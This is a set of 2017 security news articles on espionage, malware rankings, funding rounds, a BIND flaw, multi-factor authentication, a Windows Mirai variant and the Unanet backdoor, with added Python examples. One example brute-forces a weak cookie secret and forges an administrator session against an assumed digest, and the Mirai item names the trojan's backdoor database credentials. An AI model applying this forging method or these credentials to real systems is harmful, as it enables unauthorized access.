“There were no attacks on the encrypted level. So the information – delicate, sensitive information – that is usually shared in this net, which is restricted by code, has never been attacked or part of this attack,” the government official said.

Security experts believe that the Russian Government is conducting wide-ranging espionage activity in order to gather intelligence on EU states and NATO members; the list of victims includes France, Germany, the Netherlands and Bulgaria.

Recently the French Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warned of hacking campaigns launched by Russian hackers against the upcoming elections.

Back to the present, the Italian source, who has close ties to the Foreign Ministry, confirmed that the cyber espionage campaign “did not affect the encrypted information system used to exchange the most sensitive information” but did affect “email accounts of ministry employees and the embassies”.

An Italian government official confirmed that the cyber attack occurred last spring, when Paolo Gentiloni was serving as foreign minister, and that the campaign lasted for more than four months. The official added that the hackers did not infiltrate the encrypted system used for classified communications, nor Gentiloni’s account.

Paolo Gentiloni, the Italian prime minister who was serving as foreign minister at the time, was not affected by the cyber attack. The version provided by the Italian official, who explained that Gentiloni avoided using email while he was foreign minister, is very strange.

If true, which channel did Prime Minister Gentiloni use? Why did he avoid using the Government email, which is monitored by the Government IT staff?

Russia’s foreign ministry denied any involvement in the attack and said there were “no facts to prove this claim.”

I fear that other nation-state actors may also have breached our systems; Chinese hackers, the North Korean cyber army and Iranian hackers are other actors that have to be monitored carefully.


Kelihos Becomes King of the Malware Mountain

11.2.2017 securityweek Virus
The beginning of 2017 has brought a series of changes on the malware charts, as the Kelihos botnet managed to climb to the top position, while the Conficker worm dropped to fourth on the list.

An eight-year-old threat, Conficker managed to remain one of the most active malware families out there last year, although it didn’t make the headlines as often as other threats. In 2015, however, the malware briefly returned to the spotlight after security researchers found that it had infected police body cameras.

Check Point’s latest threat report shows that Conficker is now the fourth most active malware out there, with Kelihos, HackerDefender, and Cryptowall occupying the first three positions. Conficker was the top threat in the security firm’s Top 10 “Most Wanted” malware list for quite some time.

The current leader, Kelihos, is yet another long-standing threat, one that managed to withstand several takedown attempts. In August last year, Kelihos infections registered a spike and the botnet tripled in size overnight, a clear sign that the actors behind it were considering ramping up activity. The botnet uses peer-to-peer communications, with each individual node acting as a command and control center.

Although the botnet was focused mainly on spamming stock pump-and-dump schemes or pharmaceutical scams, it was seen dropping malware as well, including ransomware such as MarsJoke, Wildfire, and Troldesh, as well as Trojans, including Panda Zeus, Nymaim and Kronos. Most recently, security researchers observed that Kelihos was also capable of infecting removable USB drives to spread to new hosts.

The second top malware family is the HackerDefender user-mode rootkit for Windows, which can be used to hide files, processes and registry keys, as well as to implement a backdoor and port redirector. The third Most Wanted malware in January was CryptoWall, a piece of file-encrypting ransomware that uses AES encryption and the Tor anonymity network.

Nemucod (JavaScript or VBScript downloader), RookieUA (info stealer), Nivdort (multipurpose bot also known as Bayrob), Zeus (banking Trojan), Ramnit (banking Trojan), and Necurs (spam botnet mainly associated with the distribution of Locky) round out the Top 10 Most Wanted malware list.

The mobile threat landscape registered changes as well last month, as the Triada modular backdoor for Android secured the first position on the Top 3 Most Wanted mobile threats. Detailed in March last year, Triada was considered the most advanced mobile malware to date.

HummingBad, an Android Trojan capable of establishing a persistent rootkit on a device and installing additional applications, dropped to the second position. Dubbed HummingWhale, a new variant of this malware was discovered a couple of weeks ago, after it managed to infect 20 apps in Google Play and supposedly infect millions of devices.

Hiddad, a piece of Android malware that repackages legitimate apps and then releases them to a third-party store, is currently the third “most wanted” mobile threat. The malware, security researchers note, was designed to display ads but can also be used to gain access to key security details built into the OS, thus enabling the attacker to obtain sensitive user data.

“The wide range of threats seen during January utilizes all available tactics in the infection chain to try and gain a foothold on enterprise networks. To counter this organizations need advanced threat prevention measures on networks, endpoints and mobile devices to stop malware at the pre-infection stage, to ensure that they are adequately secured against the latest threats,” Check Point concludes.


Israeli Startup Empow Raises $9 Million for U.S. Expansion

11.2.2017 securityweek IT

Israeli startup Empow Cyber Security announced on Thursday that it has raised $9 million in a Series A funding round. $8 million has come from private investors and $1 million from the Office of the Chief Scientist at the Israel Ministry of Economy. The money will be used primarily to expand the company's operations in North America.

Empow currently employs three staff in its Boston, Mass. office, which will be expanded, and a second office will be opened on the West Coast later in 2017. Both offices handle sales and marketing for the U.S. market, with R&D remaining in Ramat Gan, Israel.

Empow provides a platform that unifies separate security defenses in a more efficient and effective manner than unwieldy SIEMs. It uses security abstraction to separate the security infrastructure into primary components it calls ‘security particles’. These particles are then linked together using a common language that interacts with the APIs of the different security technologies, enabling the complete security infrastructure to be viewed and treated as a single entity rather than a series of individual silos.

Without that cross-technology visibility, individual alerts from different technologies can easily be missed. A possible phishing alert in isolation could be ignored by analysts. A subtle possibility of credential misuse from a different technology could also be missed.

Empow concentrates on 'intent'. If it spots a phishing possibility in the email alerts, it knows what to look for in the network alerts; and ties the phishing and credential misuse into a threat warning for the analyst.

As new attack methodologies emerge, empow can be 'taught' to recognize the different indications in the different technologies of the customer's infrastructure. empow itself is vendor-neutral, so the infrastructure itself does not need to change -- empow's purpose is to make any infrastructure more efficient. This means it can work with any existing infrastructure, whether that is on-premise or in the cloud.

While customers can develop their own 'apps' to detect, investigate and mitigate new attack methodologies, empow also provides an app store for emerging and common issues. These currently include cross-technology indicators for threats such as ransomware, spear-phishing, privilege escalation and financial data leaks.

Avi Chesla, co-founder and CEO, explains, "Empow creates an enterprise security posture that is as robust and nimble as the attacks it aims to prevent. Our security abstraction is creating a radical change in the realm of cybersecurity, making cyber-defenses exponentially better than the sum of their parts. It's like a cyber general coordinating your security army: empow helps sends the right troops into battle at the right time."


Demisto Raises $20 Million to Help Enterprises Fight Alert Fatigue

11.2.2017 securityweek Security
Demisto, a Cupertino, Calif.-based maker of software that helps Security Operations teams fight “alert fatigue” and reduce the time to respond to a breach, announced on Thursday that it has closed a $20 million Series B round of funding.

In addition to announcing the new funding, the company introduced the latest version of its security operations platform. The company’s new “Demisto Enterprise 2.0 Security Operations Platform” is an incident management platform designed to help customers integrate threat feeds and manage indicators to automate threat hunting operations.

The platform is available now with annual pricing starting at $100,000 for up to two analysts.

“Demisto was built to make security analysts’ lives easier with its combined incident response case management and security orchestration platform,” said Slavik Markovich, CEO of Demisto.

“Demisto simplifies the way enterprises manage incident response with its automated and collaborative incident response platform that delivers unprecedented insight and resolution into complex threats,” explains Jay Leek, managing director at ClearSky and former CISO of Blackstone.

According to the company, the new funds will be used to expand operations and accelerate new product development and customer rollouts, and support sales and marketing efforts.

The company has offices in Silicon Valley and Tel Aviv; the new round brings Demisto’s total funding to $26 million.


Research Unearths 5 Secrets for Higher Performing CISOs

11.2.2017 securityweek Security
IANS Research has developed a model designed to help chief information security officers to maintain their inherent promise: that is, "to safeguard critical assets across space and time."

This model, which it calls CISO Impact, rests on two fundamental capabilities: technical excellence and organizational engagement. The former involves eight domains, from access control to incident response; the latter includes seven factors, from running infosec like a business to getting the business to own the risk.

From this model, combined with insights from more than 1,200 high-performing CISOs and information security teams, IANS has developed what it terms 'The 5 Secrets of High-Performing CISOs'.

"The connected world is a dangerous place," says Stan Dolberg, chief research officer at IANS Research, "and because of this, CISOs and their teams must lead their organizations to adopt safe business practices. However, the challenge remains that many CISOs are leading from a position of little authority or influence. The CISO Impact diagnostic provides specific ways for CISOs to assert information security leadership skills that are commonly found in organizations one step ahead on the maturity curve. Our goal is to inform, contextualize and prioritize where to invest skills, practices, and technologies. Armed with this strong guidance, CISOs can chart their own paths to leadership."

Related: Learn More at SecurityWeek's 2017 CISO Forum

Put bluntly, the purpose of this report is to help lower performing CISOs to perform better through using the methods already used by high performing CISOs. The five secrets to achieving career success are:

Lead without authority

Embrace the change agent role

Don't wait to be invited to the party

Build a cohesive cyber cadre

It's a 5 to 7-year journey to high impact

Each of these 'secrets' is discussed in the report and supported by statistical research evidence. For example, 100% of high performers lead despite having no authority, using "persuasion, negotiation, conflict management, communication, education." Only 3% of low performers succeed in this.

For the second 'secret', the report states: "High-performing CISOs know the value of engaging to drive change. In the CISO Impact data, 3 out of 4 of high performers embrace this approach, compared to 1 in 20 of the low performers. To embrace this role, know the business, know yourself, and get ready to 'make lemonade'."

The third secret is not so widely adopted by the high performers. "More than half of high performers in the CISO Impact data set didn't wait for executives to have an epiphany that security matters," states the report. "They leveraged the power of simulation to generate the emotional experience of loss or compromise that is fundamental to an engaged executive team." Less than 1% of low performers did similar.

In secret 4, "High performers patiently assemble and train more than a team -- they culture a cyber cadre." This approach is adopted by 85% of high performers, but by only 1.4% of low performers.

The fifth secret warns that there is no quick fix. "Five to seven years is a realistic time frame for building the trust, the program, the team, and the value of information security to the point where information security is baked in."

These five secrets provide excellent advice for improving company security and enhancing CISO careers. As stand-alone research, however, the report has several problems. The first is the distinction between a high performer and a low performer. The second is that it is easier to be a high performer in some companies than it is in others.

Martin Zinaich (CSSLP, CRISC, CISSP, CISA, CISM and more), information security officer for the City of Tampa, comments: "'You must lead without authority' -- that is so very true! You have to do that both technically and from an organic business integration standpoint. Yet," he told SecurityWeek, "the study shows that 60% of high performing security leaders report into risk and business roles (that have authority) -- and 95% of lower performing CISOs report to the CIO (where they don't). Those two stats show the simple reality that it is very difficult to lead without authority. Almost every non-technical safe corporate-wide business practice I have seen where the CISO is lacking authority has come via post breach, regulations or working with the Audit department."

The danger for research statistics is that some of the low performers could be high performers in a different company with more resources and/or a more receptive C-Suite.

A similar issue occurs in the fifth secret; that is, 'it's a 5 to 7-year journey to high impact'. The reality is that few CISOs will remain in one position for that long -- in fact, it is probably only the high performing CISOs already occupying a high-flying position with a security-aware company that will do so.

Such concerns, however, only affect the statistical difference between high- and low-performing security officers. The basic arguments contained within the five secrets remain quality advice for any CISO who wants to better secure their organization and improve their career potential.

The IANS Research report, "The 5 Secrets of High-Performing CISOs" will be presented at the RSA Conference next week.


Potentially Serious DoS Flaw Patched in BIND

11.2.2017 securityweek Vulnerability
A potentially serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.

The flaw, tracked as CVE-2017-3135, affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 releases.

In the case of servers with specific configurations, the vulnerability is remotely exploitable and rated as “high severity” with a CVSS score of 7.5.

“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer,” ISC said in its advisory.

“Servers utilizing both DNS64 and RPZ are potentially susceptible to encountering this condition. When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.

Servers that don’t use RPZ and DNS64 at the same time are not affected by the security hole.

The vulnerability, reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox, has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3. Users have been advised to update their installations; removing either DNS64 or RPZ from the configuration, or restricting the contents of the policy zone, is considered a workaround.
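As an added check, not from the ISC advisory or from the article, the following Python script decides from `named -v` output and a `named.conf` whether a server falls in the affected version ranges listed above and whether it actually enables both DNS64 and response-policy, the only combination the advisory says can reach the faulty code path. The version ranges are those stated in the text; the sample version string and configuration fragment are constructed.

```python
import re

# Fixed releases named in the ISC advisory for CVE-2017-3135, keyed by branch.
# 9.8 has no fixed release listed: 9.8.8 is simply named as affected.
FIXED_BY_BRANCH = {
    (9, 9): (9, 9, 9, 6),    # 9.9.9-P6
    (9, 10): (9, 10, 4, 6),  # 9.10.4-P6
    (9, 11): (9, 11, 0, 3),  # 9.11.0-P3
}


def parse_bind_version(text):
    """Extract (major, minor, patch, plevel) from 'named -v' output or a bare version.

    '9.10.4-P5' -> (9, 10, 4, 5); a release without a -Pn suffix gets plevel 0, so
    plain 9.9.9 sorts below 9.9.9-P1 and 9.9.10 sorts above 9.9.9-P6.
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:-P(\d+))?", text)
    if not m:
        raise ValueError("no BIND version found in %r" % text)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_affected(text):
    """True if the running BIND is in a range the advisory lists as affected."""
    v = parse_bind_version(text)
    branch = v[:2]
    if v[:3] == (9, 8, 8):
        return True  # named explicitly; 9.8 is end-of-life, so move to a supported branch
    if branch == (9, 9):
        return (9, 9, 3, 0) <= v < FIXED_BY_BRANCH[branch]  # "all 9.9 releases since 9.9.3"
    if branch in FIXED_BY_BRANCH:
        return v < FIXED_BY_BRANCH[branch]                  # every 9.10 / 9.11 before the fix
    return False


def strip_named_conf_comments(conf):
    """Drop /* */, // and # comments so a commented-out statement is not counted."""
    conf = re.sub(r"/\*.*?\*/", "", conf, flags=re.S)
    return re.sub(r"(//|#).*", "", conf)


def config_exposed(conf):
    """True if named.conf enables both DNS64 and response-policy (RPZ)."""
    body = strip_named_conf_comments(conf)
    has_dns64 = re.search(r"\bdns64\b", body) is not None
    has_rpz = re.search(r"\bresponse-policy\b", body) is not None
    return has_dns64 and has_rpz


def assess(version_text, conf):
    """Return (affected_version, exposed_config, action_needed)."""
    affected = version_affected(version_text)
    exposed = config_exposed(conf)
    return affected, exposed, affected and exposed


# Constructed inputs for a stand-alone run: a 'named -v' line and a named.conf fragment.
SAMPLE_VERSION = "BIND 9.10.4-P5 <id:6e8c2a9>"
SAMPLE_CONF = """
options {
    directory "/var/cache/bind";
    recursion yes;
    // both rewrite features in the same server: the combination the advisory describes
    dns64 64:ff9b::/96 { clients { any; }; };
    response-policy { zone "rpz.example"; };
};
zone "rpz.example" { type master; file "rpz.example.db"; };
"""

if __name__ == "__main__":
    affected, exposed, action = assess(SAMPLE_VERSION, SAMPLE_CONF)
    print("version affected: %s, DNS64+RPZ configured: %s, patch or reconfigure: %s"
          % (affected, exposed, action))
```

The configuration test is a text heuristic: it does not follow `include` statements or check that the two statements sit in the same `view`, so feed it the fully concatenated configuration (for example the output of `named-checkconf -p`) and treat a hit as a reason to look, not as proof.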

The flaw was disclosed on Wednesday, but advance notifications were sent out on February 1. Linux distributions, most of which have classified this as a medium severity issue, are working on releasing patches.


Hackers Targeted Italy Foreign Ministry, Russia Accused

11.2.2017 securityweek Hacking
Rome - Italy's foreign ministry was attacked by hackers last year, a diplomatic source told AFP on Friday, amid reports that Russia could be to blame.

"After the first attack the system was immediately strengthened," said the source, who asked not to be named, after Britain's Guardian newspaper said the ministry had come under a sustained cyber offensive -- and officials suspected Russia.

Russia's foreign ministry said there were "no facts to prove this claim," according to Italian media reports.

The Italian source, who has close ties to the foreign ministry, said the attacks "did not affect the encrypted information system used to exchange the most sensitive information" but did affect "email accounts of ministry employees and the embassies".

The malware attack lasted over four months but did not affect then-foreign minister Paolo Gentiloni -- Italy's current prime minister -- because he avoided using email during his mandate, the Guardian said.

Any sensitive information sent by email from the embassies would also have been protected because it would have been encrypted.

The daily said the hack was being investigated by Rome's chief prosecutor.

There have been concerns in recent weeks that Moscow has stepped up a cyber campaign against several European countries including Germany, France, Norway and the Netherlands.

Russia's alleged interference in the US presidential campaign last year by reputed hacking of Democratic Party computers and leaks of embarrassing communications raised fears the country may try to interfere in upcoming European elections.


Vícefaktorová autentizace jako mainstream

11.2.2017 SecurityWorld Zabezpečení
Stále více uživatelů používá pro svou identifikaci spíše otisk prstu než zadání hesla. Vícefaktorová autentizace (MFA, Multifactor Authentication) se totiž jeví jako jednodušší a bezpečnější. A navíc u ní neexistuje uložený seznam hesel, který by mohli útočníci ukrást. Jsou ale MFA už natolik propracované, aby se staly hlavním proudem?

V roce 2014 se USAA stala první finanční institucí, která zavedla rozpoznávání obličejů a hlasu do mobilní aplikace, prohlašuje Gary McAlum, tamější ředitel zabezpečení této společnosti. Rozpoznávání otisků prstů následovalo o pár měsíců později. A rok poté už měla USAA mezi svými pěti miliony uživatelů mobilní bankovní aplikace 1,1 milionu těch, kteří nativně využívali vícefaktorovou autentizaci.

„Současný model zabezpečení internetu je zastaralý a umírající. Je založen na informaci, která je známá (například vaše heslo nebo maskot na střední škole), ale vše už lze snadno zjistit – třeba pomocí úniků dat z Facebooku,“ poznamenává McAlum. „Odklon od ‚známé informace‘ je tedy naprosto nezbytný.“

„Téměř každá banka na světě používá jako alternativu vícefaktorovou autentizaci,“ tvrdí Avivah Litanová, analytička Gartneru. Po celá desetiletí se vícefaktorová autentizace využívala v podobě „bezpečnostního tokenu“, malého zařízení, které zobrazovalo jednorázové heslo, jež se každých několik minut měnilo. Bezpečnostní server banky měl stejný algoritmus a dokázal nejnovější správné heslo poznat.
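As an added illustration, not taken from the article or from any of the vendors quoted in it, here is the mechanism behind such a token in Python: the device and the server share a secret and a clock, and both derive the same one-time code (RFC 4226 HOTP underneath RFC 6238 TOTP, which uses 30-second slots rather than the "few minutes" of older hardware tokens). The shared secret is the RFC test vector, not a real key.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian 64-bit counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, at_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time in `step`-second slots."""
    return hotp(secret, int(at_time) // step, digits)


def verify_totp(secret, candidate, at_time=None, step=30, digits=6, window=1):
    """Server side: accept the current slot plus `window` slots either side (clock drift),
    comparing in constant time. A real deployment also refuses to accept a code twice."""
    if at_time is None:
        at_time = time.time()
    counter = int(at_time) // step
    return any(
        hmac.compare_digest(hotp(secret, counter + delta, digits), candidate)
        for delta in range(-window, window + 1)
    )


# Shared secret from the RFC 4226 / RFC 6238 test vectors (ASCII "12345678901234567890").
# In a real deployment this is a random key provisioned once, never a user-chosen value.
TEST_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    # The token displays this code; the bank's server recomputes it from the same secret and clock.
    now = time.time()
    shown = totp(TEST_SECRET, now)
    print("code on token:", shown)
    print("accepted by server:", verify_totp(TEST_SECRET, shown, now))
```

The caveat a practitioner should keep in mind: a code like this proves possession of the secret, not the identity of the site the user is typing it into. A phishing page that relays the code within the same 30-second slot is still accepted, which is why the article's later point about device binding matters.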

"Multi-factor authentication has always been too complicated and too expensive for broad use," says Jon Oltsik, a security analyst at Enterprise Strategy Group. "What is changing now is the use of consumer technology, above all smartphones, and the growing use of biometric factors such as the fingerprint readers in smartphones."

Defining the factors

"Multi-factor authentication is something you know, something you have and something you are, and it uses more than one of these factors," explains Michael Lynch, chief strategy officer at InAuth, a company specialising in authentication.

"Something you know is a credential such as a password. Something you have can be a security token, but in the case of mobile phones the device itself is the security token. It can also be a computer. Something you are is biometrics, for example fingerprint, iris, voice or pulse recognition," Lynch explains.

Other biometric factors in use or under consideration include heart rate, typing speed, the pattern of blood vessels in the white of the eye or in the skin, gait, location and long-term behavioural patterns. Iris recognition, however, requires a camera capable of infrared imaging.

In some cases two-factor security is used. The traditional username and password combination usually counts as one factor and the device as the second, Lynch says. The new trend, however (as at USAA), is to use the mobile device as one factor and a biometric trait detected by that device as the second, with no password at all.

Lynch explains that on the desktop a so-called browser fingerprint, built from information about fonts, language, applications and browser type, can serve as the second factor.

"The so-called device fingerprint changes over time as applications are updated and patches are installed, so it typically lasts 60 days or less," which is why a bank's login requirements can suddenly change for a desktop user, Lynch explains, adding that the combination of a cookie and a browser fingerprint is a more reliable method.

Cookies, he says, can last as long as the browser installation, but the computer in question may not allow them.

"You may not even see the second factor; the bank almost always checks your computer via a cookie," Litan notes. If it does not recognise the computer, it often sends a one-time password to the user's mobile phone or e-mail address.

As for biometric factors on mobile devices, "fingerprint ID is significant because it is often built in, it is convenient and users actually use it, but it is neither better nor worse than other ID methods," says Jim Ducharme, a vice president at security firm RSA, now part of Dell EMC.

The lower popularity of methods such as voice or face recognition is, in his view, due to the fact that in many situations they simply do not work: a voice on the subway, or a face in a nightclub.

At USAA, around 90 percent of users rely on fingerprint recognition, and the login success rate for both fingerprint and face is above 90 percent, McAlum says.

Although voice recognition depends more on the surroundings, some users still prefer it, he adds. (USAA also offers access by PIN code in case the other methods fail.)

The choice of factor is not always a purely technical matter. "In some places it is not acceptable to use the face as an identifier, because clothing gets in the way or because some people regard the eye as the window to the soul," explains Marc Boroditsky, a vice president at Authy, which supplies authentication software.

People may also dislike fingerprint sensors for various reasons. In Brazil, he says, they are thought to imply criminality. In parts of Asia, people consider it unclean to touch a fingerprint sensor.

"Your identity is a personal thing, and once you start using parts of people for identification you are touching something with complex cultural implications," Boroditsky adds.

"Almost every biometric factor also raises the question of surveillance. There is a creepy aspect to detecting users without their involvement in the process. We have to stay ahead of that and give customers a choice: for example, to be able to switch off location detection and add another step to the authentication process," Boroditsky says.


Windows Trojan Spreads Mirai to Linux Devices

10.2.2017 securityweek Virus
Mirai, the Linux-based malware that ensnared hundreds of thousands of Internet of Things (IoT) devices to build one of the largest distributed denial of service (DDoS) botnets out there, now has a Windows variant as well.

Mirai became popular last fall, after it targeted Brian Krebs’ blog and infrastructure provider Dyn in two of the largest DDoS attacks on record. Soon after, the malware’s source code leaked online and new variants of the Trojan were spotted, including one packing worm-like capabilities.

Although Mirai has until now been confined to Linux-based IoT devices, Doctor Web security researchers warn that a Windows component has joined it. Detected as Trojan.Mirai.1, the new malware is written in C++ and is capable of a range of malicious operations, one of which is spreading the Mirai bot to Linux-based devices.

When launched on the infected Windows machine, the Trojan connects to its command and control (C&C) server and downloads a configuration file from which it extracts a list of IP addresses. Next, the malware launches a scanner that searches for the network nodes listed in the configuration file and attempts to log in to them using the login and password combinations from the same file.

According to Doctor Web’s security researchers, the Windows version of Mirai is capable of scanning and checking several TCP ports simultaneously (including 22, 23, 135, 445, 1433, 3306, and 3389).

As soon as it connects to one of the attack nodes (via any of the available protocols), the Trojan begins the execution of a series of commands indicated in the configuration file. However, should the connection be made via Remote Desktop Protocol (RDP), none of the instructions is executed.

What’s more, if the threat manages to connect to a Linux device via the Telnet protocol, it then attempts to download a binary file to it. This file is meant to subsequently download and launch the Mirai botnet.

The Windows version of Mirai can also abuse Windows Management Instrumentation (WMI) to execute commands on remote hosts, using inter-process communication (IPC) technology. The malware was designed to launch new processes with Win32_Process.Create method, and create various files (such as Windows package files containing a certain set of instructions).

If Microsoft SQL Server is present on the infected machine, the malware uses it to create a series of files and a user with sysadmin privileges. It then abuses this user and the SQL Server event service to carry out malicious tasks: launching executable files with administrator privileges, deleting files, or planting icons in the system folder for automatic launch (it can also create the corresponding entries in the Windows registry).

“After connecting to a remote MySQL server, the Trojan creates the user MySQL with the login phpminds and the password phpgod, for the purpose of achieving the same goals,” Doctor Web notes. This user has the following privileges: select, insert, update, delete, create, drop, reload, shutdown, process, file, grant, references, index, alter, show_db, super, create_tmp_table, lock_tables, execute, repl_slave, repl_client, create_view, show_view, create_routine, alter_routine, create_user, event, trigger, and create_tablespace.


Unanet Backdoor Allows Unauthenticated Access

10.2.2017 securityweek Virus
A backdoor found in the default configuration of the Unanet web application allows an unauthenticated attacker to login and manipulate user accounts and the roles they maintain.

Unanet provides end-to-end services automation, its web-based software enables the management of people and projects from a single database. According to the company, it offers “one look and feel, and one connected set of applications.”

The issue, Trustwave security researchers say, resides in a code branch within the Unanet product that maintains a hardcoded user which is not listed in the users table of the database. This user, they explain, was initially identified via a user enumeration vulnerability.

The user cannot log in directly but, because Unanet's session cookies are built in a vulnerable manner, with zero entropy and no session timeouts, anyone can bypass authentication as this user. A Unanet session cookie, the researchers explain, is constructed from the UserID, the username in uppercase, the roles concatenated with '^', a static cookie value, and a digest.

What's more, usernames and IDs were available via user enumeration: iterating the 'personkey' value caused each username and ID to be echoed into an error page that an attacker could parse to list the existing usernames in the system.

Because the user roles are known (they are listed in the 'Roles' tab of the preferences section), the researchers identified 19 roles within the environment, although the roles are not specifically associated with each user. However, the researchers say the possible combinations of users and roles can be brought down to around 5! permutations, few enough to be determined by brute force.

At this point, with the UserID, usernames and roles already discovered, all an attacker needs to reconstruct a Unanet session cookie is the special cookie value, which is referred to as a nonce (a value that, by definition, should be used only once). It is, however, set to a default, although Unanet suggests it should be changed.

As long as the value hasn’t been changed, “the hidden cookie value can be brute forced offline, using the knowledge of all other values. This is true because the algorithm for generating the digest is known and when userID, username, roles, and digest are known it becomes a simple problem of solving for the single missing variable,” Trustwave security researchers explain.

User unanet (id 0), however, is not handled in the same way, and the researchers discovered that, if the personkey was zero, it would go to the makeadmin section, and that the method generated a new person 'unanet' and assigned the password 'UNANET' to it. Additionally, it called the 'setUnanetAdministrator(true)' method.

Armed with the UserID, the username and the secret group __unanetAdministrator__, the researchers generated the digest, reconstructed the cookie, and logged in as that user. The main issue, they say, is that anyone can use this method to access a Unanet system.

“This is not some deep, arcane issue. Anyone having access to a Unanet system is capable of generating the same conclusion via a simple code review. Additionally, even if the cookie 'nonce' was changed, any user of the system (or attacker who intercepts a request) is capable of brute forcing the new nonce offline. Currently any system that has not changed their cookie 'nonce' is vulnerable to an unauthenticated attacker being able to login with unanetAdministrator privileges,” the researchers mention.
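As an added example (not Unanet's code; the article does not describe the real digest algorithm, so the SHA-256 construction below is an assumed stand-in), the Python below shows why a static, low-entropy "nonce" can be solved for offline from a single captured cookie, how the recovered value lets an attacker mint a cookie for a user they never authenticated as, and the hardened alternative: an opaque, high-entropy session token with server-side state and expiry. The user IDs, role names and the four-digit default are constructed.

```python
import hashlib
import hmac
import itertools
import secrets


# ASSUMED toy digest. The field order (user id, upper-cased username, roles joined with
# '^', a static value, a digest) follows the article; the '|' separator and the hashing
# are illustrative and not Unanet's real algorithm.
def digest(user_id, username, roles, static_value):
    material = "|".join([str(user_id), username.upper(), "^".join(roles), static_value])
    return hashlib.sha256(material.encode()).hexdigest()


def make_cookie(user_id, username, roles, static_value):
    """Build a cookie the way a stateless scheme with one shared static value would."""
    return "|".join([str(user_id), username.upper(), "^".join(roles),
                     digest(user_id, username, roles, static_value)])


def parse_cookie(cookie):
    user_id, username, roles, d = cookie.split("|")
    return int(user_id), username, roles.split("^"), d


def verify_cookie(cookie, static_value):
    """Server side: recompute the digest over the visible fields and compare."""
    user_id, username, roles, d = parse_cookie(cookie)
    return hmac.compare_digest(digest(user_id, username, roles, static_value), d)


def brute_force_static_value(cookie, candidates):
    """Offline attack: every field except the static value is visible in one captured
    cookie, so each candidate costs a single hash. Returns the value found, or None."""
    user_id, username, roles, d = parse_cookie(cookie)
    for candidate in candidates:
        if hmac.compare_digest(digest(user_id, username, roles, candidate), d):
            return candidate
    return None


def four_digit_candidates():
    # Constructed search space standing in for a weak default: 10,000 hashes, instant offline.
    for digits in itertools.product("0123456789", repeat=4):
        yield "".join(digits)


# Hardened alternative: an opaque, high-entropy session id looked up server side, with expiry.
# Nothing about the user or roles travels in the cookie, so there is nothing to solve for.
SESSIONS = {}


def issue_opaque_session(user_id, username, roles, now, ttl=900):
    token = secrets.token_urlsafe(32)          # 256 bits of randomness per session
    SESSIONS[token] = (user_id, username.upper(), list(roles), now + ttl)
    return token


def lookup_opaque_session(token, now):
    entry = SESSIONS.get(token)
    if entry is None or now >= entry[3]:        # unknown or expired: drop and deny
        SESSIONS.pop(token, None)
        return None
    return entry[:3]


if __name__ == "__main__":
    WEAK_DEFAULT = "4711"                       # constructed stand-in for an unchanged default
    own = make_cookie(1042, "jdoe", ["Timesheet User", "Project Viewer"], WEAK_DEFAULT)
    recovered = brute_force_static_value(own, four_digit_candidates())
    print("recovered static value:", recovered)
    forged = make_cookie(0, "unanet", ["__unanetAdministrator__"], recovered)
    print("forged admin cookie accepted:", verify_cookie(forged, WEAK_DEFAULT))
```

The design point is the last two functions: once the cookie is only a lookup key, changing the "nonce" stops being a hardening step because there is no shared value left to recover, and the expiry gives the session timeout the researchers found missing.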

At the moment, there are around 1,600 public-facing instances of Unanet that are potentially affected by this issue, Trustwave says. By exploiting it, an attacker could access the system and remove users, change roles, and create a new administrator. With these privileges, the attacker can deny availability, compromise integrity, and remove confidentiality, the security researchers say.

The issue was patched in Unanet versions 10.0.51, 10.1.43, and 10.2.5.


Hundreds of Arby's Restaurants Hit by Card Breach

10.2.2017 securityweek Incident
Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the United States, admitted this week that its payment processing systems had been breached by cybercriminals.

Arby’s told journalist Brian Krebs, who learned about the incident from sources in the financial industry, that it was alerted to the breach in mid-January by industry partners. The company said it had not disclosed the incident to the public at the FBI’s request.

The fast food chain said it immediately brought in Mandiant and other security experts to remove the malware from its systems and investigate the incident. The company is confident that the compromised systems have been cleaned up.

The investigation is ongoing, but the breach appears to have affected Arby’s corporate-owned restaurants and not franchised locations. Of Arby’s more than 3,300 stores in the U.S., over 1,000 are corporate restaurants, but not all of them are impacted.

It is unclear how many payment cards may have been stolen, but Krebs is aware of an alert from PSCU, a credit union service organization with over 800 members, which warned that more than 355,000 credit and debit cards issued by its members were compromised in a breach at a major fast food restaurant chain.

The PSCU alert estimated that the breach occurred between October 25, 2016 and January 19, 2017.

Arby’s is not the only major fast food restaurant chain targeted by cybercriminals. Wendy’s launched an investigation in January 2016 and initially determined that roughly 300 of its restaurants had been hit by a hacker attack that started in 2015.

Wendy’s later determined that the actual number of affected locations exceeded 1,000 and experts believe the incident affected hundreds of thousands of cards.


Cisco Launches "Umbrella" Secure Internet Gateway

10.2.2017 securityweek Safety
Cisco announced this week the launch of Umbrella, a cloud-based Secure Internet Gateway (SIG) solution designed to provide visibility and protection for devices on and outside the corporate network.

Organizations are increasingly relying on software-as-a-service (SaaS) products, such as WebEx, Office 365, Google Docs, Salesforce and Box. While these applications can significantly improve productivity, they are often used over untrusted Internet connections without being protected by a VPN.

Cisco wants to address this problem with the launch of Umbrella. The new cloud service aims to provide safe and secure access from anywhere, even when a VPN is not used.

